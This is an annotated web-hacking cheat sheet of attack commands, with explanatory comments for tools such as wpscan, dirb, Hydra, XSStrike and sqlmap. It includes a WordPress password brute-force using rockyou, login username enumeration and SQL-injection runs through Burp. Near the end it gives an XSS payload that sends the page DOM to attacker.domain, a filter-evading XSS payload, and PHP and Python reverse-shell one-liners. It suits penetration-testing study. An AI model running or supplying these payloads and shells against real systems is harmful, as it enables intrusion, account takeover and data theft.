

HACKING WEB TABLE OF COMMANDS

TOOL COMMAND
WPSCAN
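# Plugin enumeration (-e ap = all plugins) using mixed passive+active detection against a
# non-default plugins directory, authenticated via --cookie-string.
# Fill the <...> placeholders before running. In the original form --api-token had no value, so
# the option parser swallows the next token (--random-user-agent) as the API token and the
# random UA is silently never applied. The token also ends up in shell history and `ps`;
# wpscan can read api_token from ~/.wpscan/scan.yml instead of the command line.
wpscan --url https://webpage -e ap --wp-plugins-dir /wp-content/plugins/ --plugins-detection mixed --cookie-string "<cookie>" --api-token "<api-token>" --random-user-agent -v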
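# Password attack against one known username. The original had a bare `max-threads 50`, which
# wpscan would reject as a stray positional argument; the option is --max-threads.
# 50 threads against wp-login/xmlrpc is noisy and may trigger lockout plugins — lower it on
# targets where that matters (presumably; check the target's login protections first).
wpscan --url http://webpage --usernames bob --passwords ../rockyou.txt --max-threads 50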
DIRB
# Directory brute force with dirb's default wordlist, routed through a local proxy (-p) with a
# 4000 ms pause between requests (-z), an authenticated cookie (-c) and a fixed browser UA (-a).
# -l prints the Location header on redirects, -w keeps going past WARNING messages.
# The X-Originating-IP / X-Forwarded-For headers set to 127.0.0.1 are a probe for
# IP-allowlist or "localhost only" checks that trust client-supplied headers.
dirb https://target.web -c "COOKIE-STRING" -p 127.0.0.1:8080 -z 4000 -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -a "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0" -l -w
WhatWaf
# WAF fingerprinting through a local proxy with a random UA (--ra), forced TLS and custom headers.
# NOTE(review): whatwaf is an HTTP client and does not need root — drop `sudo` unless your
# install location forces it. The target port (8080) is the same as the proxy port here; that is
# almost certainly a placeholder collision, set the real target port.
# NOTE(review): in some whatwaf versions -T/--throttle takes a numeric seconds argument —
# confirm for your version, otherwise --force-ssl may be parsed as the throttle value.
sudo ./whatwaf -u "https://webpage:8080/" --proxy http://127.0.0.1:8080 --ra -T --force-ssl --threads 5 -H "Cookie: <cookies>" -H "<HEADER>"  --verbose
XSStrike
# Reflected/blind XSS scan: crawl from the given URL (-l = crawl depth), discover hidden
# parameters (--params), fuzz filters (--fuzzer) and inject the blind payload (--blind).
# --proxy takes no address here: in XSStrike it is a switch and the proxy and blind-XSS
# callback URL are read from core/config.py — confirm both are set for your version.
python3 xsstrike.py --url "https://target.com/admin.php?option=2" --fuzzer -l 5 --crawl --params --blind --proxy --headers "Cookie: <cookie>"
CeWL
# Build a target-specific wordlist by spidering two levels deep (-d 2), keeping words of at
# least 5 characters (-m 5). The output file feeds the hydra/wpscan password attacks above.
cewl -d 2 -m 5 -w docswords.txt https://example.com
Hydra
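# Username enumeration via an HTTP login form: a username list (-L) with one fixed password (-p),
# and the failure string (F=) keyed on the "No account found" message — so any user that does
# NOT produce that message is reported, i.e. it exists. This does not find passwords.
# Route through Burp with HYDRA_PROXY_HTTP. The original used `export ... & hydra ...`: a single
# `&` runs the export in a background subshell, so hydra never saw the variable and went to
# the target directly, bypassing the proxy. Setting it inline on hydra's own line fixes that.
HYDRA_PROXY_HTTP=http://127.0.0.1:8080 hydra -L ./Documents/data/fuzz/SecLists/Usernames/Names/names.txt -p password target.com -s 32721 http-post-form "/admin/index.php:Action=Login&username=^USER^&password=^PASS^:F=No account found with that username." -V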
Dalfox
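# Mass XSS scan: dalfox's pipe mode reads one URL per line from stdin. Redirect the file
# straight in instead of piping it through cat.
dalfox pipe --mass < list.txt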
SQLMAP with BURP
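# SQLi test of a POST endpoint through Burp, conservative settings (level/risk 1, 2 s delay,
# 10 s time-based threshold) and a character-encoding tamper for a MySQL backend.
# --data takes only the raw POST body (param=value&...), not a full request — use -r with a
# saved request file for that (next example).
# Burp's listener speaks plain HTTP proxy protocol; with --proxy=https://... sqlmap tries a TLS
# handshake against 127.0.0.1:8080 itself and the connection fails, so the scheme is http://.
sqlmap.py --url "https://webpage" --data "<post-body>"  --random-agent --delay=2 --proxy=http://127.0.0.1:8080 --time-sec=10 --level=1 --risk=1 --cookie "<cookie>" --tamper charencode --dbms mysql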

OR from file:

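# Same scan driven from a saved raw HTTP request (e.g. copied from Burp); sqlmap takes URL,
# method, headers and body from the file. --cookie overrides the Cookie header in the file.
# Proxy scheme is http:// — Burp's listener is a plain HTTP proxy, an https:// proxy URL makes
# sqlmap attempt TLS to the listener and fail.
sqlmap.py -r request_file --random-agent --delay=2 --proxy=http://127.0.0.1:8080 --time-sec=10 --level=1 --risk=1 --cookie "<cookie>" --tamper charencode --dbms mysql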
XSS Payload
<!-- Fires on load with no user interaction and exfiltrates the full rendered DOM
     (document.documentElement.innerHTML) to attacker.domain via an image request.
     %2B is a URL-encoded '+': this form is meant to be delivered through a URL parameter that
     the server decodes; if you inject it anywhere else, use a literal + or the JS will not parse. -->
<svg/onload="(new Image()).src='//attacker.domain/'%2Bdocument.documentElement.innerHTML">
<!-- Requires a middle or right click (onauxclick). Filter evasion: the template-literal call
     syntax avoids parentheses, and the escaped `al\ert` avoids the literal string "alert"
     while still evaluating to alert. -->
<img src=something onauxclick="new Function `al\ert\`xss\``">
Reverse Shells

PHP:

# PHP reverse shell: open a TCP socket to the listener and attach an interactive sh to it.
# The `<&3 >&3 2>&3` redirects assume the socket landed on fd 3, which is the usual case when
# php is started with only stdin/stdout/stderr open; if the listener gets a connection but no
# shell, retry with the next descriptor (4, 5, ...).
php -r '$sock=fsockopen("[IPADDR]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

Python:

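# Python reverse shell: connect back, dup the socket over stdin/stdout/stderr, then spawn an
# interactive sh so all three streams go over the TCP connection.
# Uses the same [IPADDR]/[PORT] placeholders as the PHP one-liner above; the original carried a
# leftover lab address (10.8.38.29:9999) that would have to be edited out every time.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IPADDR]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'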
HTTP Status Codes

200 OK - The request has succeeded.

301 Moved Permanently - The requested resource has been assigned a new permanent URI.

403 Forbidden - The server understood the request but refuses to authorize it; unlike 401, re-authenticating will not help. During enumeration a 403 still confirms that the path exists.